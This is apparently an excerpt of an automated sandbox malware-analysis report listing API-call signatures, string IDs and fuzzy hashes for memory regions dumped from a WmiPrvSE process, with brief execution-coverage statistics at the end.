                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction ID: 03175c8240efd6444b830bb2621bcc872a1af14954c91574711b256533f1e4a6
                                                  • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction Fuzzy Hash: 0C116D30305EB243FA64A73799453FB22D27B847F4F341734AB76877EAEE2894419608
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction ID: d1b4a2a9a2090440c239e05a1d012e8df75199214fe3839828171a0060a2f742
                                                  • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction Fuzzy Hash: 9E015731301EA283FA54DB53A8483AA63E1F788BC4F984035DF4A43754DE38C989CB44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction ID: d14a2688c91baf1ebf4751e96ac0d5655c15fc3d9193639dcd12aa0ac6ca5f27
                                                  • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction Fuzzy Hash: F8010975212FB283FB249B23E8187A763E0BB55B86F540434CA4A07765EF3DC1188B08
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: 563382e08bbf674c066412f2a2e86c53a94766e40dfda60a894486088f4928eb
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: 77519D32709A72CBFB54DB16E449BAA37DAF344B88F619134DB1A43788EB75D841C708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 7550f7cb3c90e2bac6ea7802eb6f9839cfb23e206c2073458cd822806bf14f5d
                                                  • Instruction ID: 1afba685a8df43cbd982ca4f156cf4e2c61dd22e48372805788d36c4c79599d4
                                                  • Opcode Fuzzy Hash: 7550f7cb3c90e2bac6ea7802eb6f9839cfb23e206c2073458cd822806bf14f5d
                                                  • Instruction Fuzzy Hash: 49316A32205A72D7F714DF12E84A7AA77E9F744B88F258524EF5A07789DB39C940CB08
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction ID: 56c45c1fad0c17ed32efe822227d42f28fce1e7603b7c24f3ba342a9d0a211e9
                                                  • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction Fuzzy Hash: BAF03172704AB293F7608B63E9847AB67A1F748BD8F944030DB4A46654DE2DC68DCB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction ID: 5ebaaba57ef244771a9d0e5a56af852203b9cd7631878891a7d263555c201205
                                                  • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction Fuzzy Hash: 79F05831305FB283FA448B53B9041AA62A0BB48FD0F488130EF4B07B28DE38C4858B08
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction ID: d0110e067276777e740a0dd9984d03ee80c932e26c25cee874e4928c5d16c8ed
                                                  • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction Fuzzy Hash: 38F01271212E7683FB148B26E4443BB63A0FB897A5F540229DB6B466F4DF2CC545CB48
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction ID: 0e995805d2b8f05c9c43a589f2083e6e702904e21b827dd9850dc2a4e45c4b67
                                                  • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction Fuzzy Hash: 9902B732219BA586E760DF56E4903ABB7A1F3C4784F601025EB8E87BA9DF7CC454CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction ID: abd52a5604b02c82cf16bbddfb5d2cff6a5969156c7709971ae9f8928647ba4a
                                                  • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction Fuzzy Hash: 3F61A036519A7687F7609F16E4443ABB7E0F388784F601125EB8E87BA8DF78C454CB48
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 843f2e2930a1c321834a7df565c51d2e33b29835352ba8e3c9626e48afc5f12c
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 13117332B54E7353FA64162BE4553FB16C97F78374F488639AB6E166D7CB24C8814108
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: d66b48921dc96de6b2f2c8fe9efbe570a1063582f138dc3d12deded91cff8ac3
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: BE115E32A10F7323F764156BE8563FB11D17B683FAF180634AB77176E6DB28C8416A08
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                  • API String ID: 3215553584-4202648911
                                                  • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction ID: 0918c549934b38bbf7b605dbeb583fb07f4c59f66e1bb5e28e0566865a4aa0f5
                                                  • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction Fuzzy Hash: F761B036600E7243FE658B27EC483FF26E1F385758F544635CB2A837A6DB38C8428208
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 666acc49fd6df01ba370cb9f51a420fe53debf1fde292996eb6e5d688c21119e
                                                  • Instruction ID: 5508860ffa2ae090dc38ac0d395474580c379a62400876d34d732711eddaa202
                                                  • Opcode Fuzzy Hash: 666acc49fd6df01ba370cb9f51a420fe53debf1fde292996eb6e5d688c21119e
                                                  • Instruction Fuzzy Hash: 5C615632604BA58AFB609F66D4813EE77E1F358B88F244225EF4917B98DB38C595C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 1025c626cef313f68b818ff87b55f6e338f163b8b095b1a9c4e16331c1ca8b37
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 52515E32100AB2CBFF758B1795483BA77E0F355B98F184225DBA987B95CB38D491C709
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 9e803656b688fab038f8dac3e8c40f1110e6338b28a2ccf971405029959bc3cd
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 6C517F76104AB28BFBB48F2795853EA77E0F354B85F244129EB9947BD5CB38D4A0C708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: ee87d46b2dcc1ce90ccf32f14717aa525401a8b6637c694bacc681fcc3807199
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: 3A517933601A329BFB249F16E448BAA37E5F354B9CF578134DB2643789EB79D8418708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction ID: f9fd5fb0cffeb9cb08c1b479288f83c54de2251b04939d9129100611a3867f11
                                                  • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction Fuzzy Hash: 99313832201A7197FB249F13E848BAA77E4F744B9CF568124AF6A07785DB3DC941C708
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: ea223cb16a8c30a4614ff2808b6cc602d8108756aca582718aba659200e53d04
                                                  • Instruction ID: 24bc1657cf319e977f8195d12f6c74b5abbf0a624455ce2df80dff0429446ca9
                                                  • Opcode Fuzzy Hash: ea223cb16a8c30a4614ff2808b6cc602d8108756aca582718aba659200e53d04
                                                  • Instruction Fuzzy Hash: 9FD1D172714AA18AF711CFAAD8403EE3BF1F354798F144226CF5A97B99DA34D406CB44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction ID: bc2cfd87b0c844dcd2f3596daaf43696834c1274a5b44fafe57058d11e225b5a
                                                  • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction Fuzzy Hash: ED012532601FB1C7E704DB67E9041AA67A0F788B81F044435EB4A43B29DE38C0518B44
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 132266061ff4b9b8da68bf4eb15db926e852afbe6260eee4876dca9e3c8d8076
                                                  • Instruction ID: bef4d86feab72111035d47719a367ea48ffd74096f6c859843135c2bf66aa517
                                                  • Opcode Fuzzy Hash: 132266061ff4b9b8da68bf4eb15db926e852afbe6260eee4876dca9e3c8d8076
                                                  • Instruction Fuzzy Hash: 6391AD72B00E7296F7649F6698903FE3BE0B754B98F144129DF0B67A95DB34D482CB08
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction ID: 9e0196f70d2e716d1a9c4fb7d0e8c1fb6d60d46d23140fa11c032a63aab64ace
                                                  • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction Fuzzy Hash: 8A111C32711F628AFF408B61E8553BA33A4F719768F441E31DBAD467A4DF78C1A88380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: f9ae2ac97f4d715802434cfbd0ca4b9e1963434c5062de052308e56cf21b1c36
                                                  • Instruction ID: 898f1a94d1257ad74eac27c6abb52a58d04d3f02c6578cedd88258d648cd6503
                                                  • Opcode Fuzzy Hash: f9ae2ac97f4d715802434cfbd0ca4b9e1963434c5062de052308e56cf21b1c36
                                                  • Instruction Fuzzy Hash: E5718B36210EB287F6249B27AC443FB66D4F399B84F640136DF0A53B99DA35D6458708
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: a2e91eab365d4defa6a58ce1a494d542bc026da6257776793ac04fc28f9cb92e
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: 0F616636600BA58AFB209F66D0847EE77E0F344B8CF044625EF5A17B98DB38D195C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 94153bbf33019caaa40224d47f7b4f8b7f9df6d428528a95645a5a22a8f385cf
                                                  • Instruction ID: 9dbfffa4333f54a4ddff8da42e61523c45df93abe640b34d8874bb995f892e79
                                                  • Opcode Fuzzy Hash: 94153bbf33019caaa40224d47f7b4f8b7f9df6d428528a95645a5a22a8f385cf
                                                  • Instruction Fuzzy Hash: 2C51D132604BB383F6649F2BA8583FB66D1F395780FA54135DF4903B9ADA39D5048748
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction ID: ab90102971ceac8fa3f56f4246b04eaec36c3a24b591b7a8d71cbeb1660410a4
                                                  • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction Fuzzy Hash: 0141A072325BA186EB20CF66E8443EA67A0F798794F504031EF4E87794EB3CD441CB44
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction ID: cb4bd3035315878e9280cd40621ea5b27acae0a16cadb2226724a93f81651644
                                                  • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction Fuzzy Hash: 08112B32219FA182EB618B16E4403AA77E5FB88B94F684220EF8D47B59DF3CC551CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: ierarchy Descriptor'$riptor at (
                                                  • API String ID: 592178966-758928094
                                                  • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction ID: 112806ad95ac896329d262121708039c41668deed9793ab86bc8cb95b4050cd3
                                                  • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction Fuzzy Hash: B1E08671640F5591EF019F22E8402E933E0EB58B64F8891329A5C46311FA38D1E9C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: Locator'$riptor at (
                                                  • API String ID: 592178966-4215709766
                                                  • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction ID: 7d2c095a9c56a5355ae211026a3b2c0daa07a94b6f15b3db03e56239e804f347
                                                  • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction Fuzzy Hash: 5EE08671600F5581EF019F22D4401E973E0F758B64BC89132CA5C46311EA38D1E5C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction ID: fb449ff803a768897cf851f5cb12486fe80c59e499925aaffc7e705f13000d72
                                                  • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction Fuzzy Hash: 59114935612FB682FA449B67A8042BB63E1FB89FC0F184024DF4A57766DE39C4428704
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction ID: a867238719bf320315f8cd5d1f82c9140e1c20cb471035599175f90c7ac29ed0
                                                  • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction Fuzzy Hash: 46E06D35602E6587FB448F63D8083AB36E1FB89F06F04C024CA0A07751DF7D8499CB50

                                                  Execution Graph

                                                  Execution Coverage:44.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:36.8%
                                                  Total number of Nodes:223
                                                  Total number of Limit Nodes:20
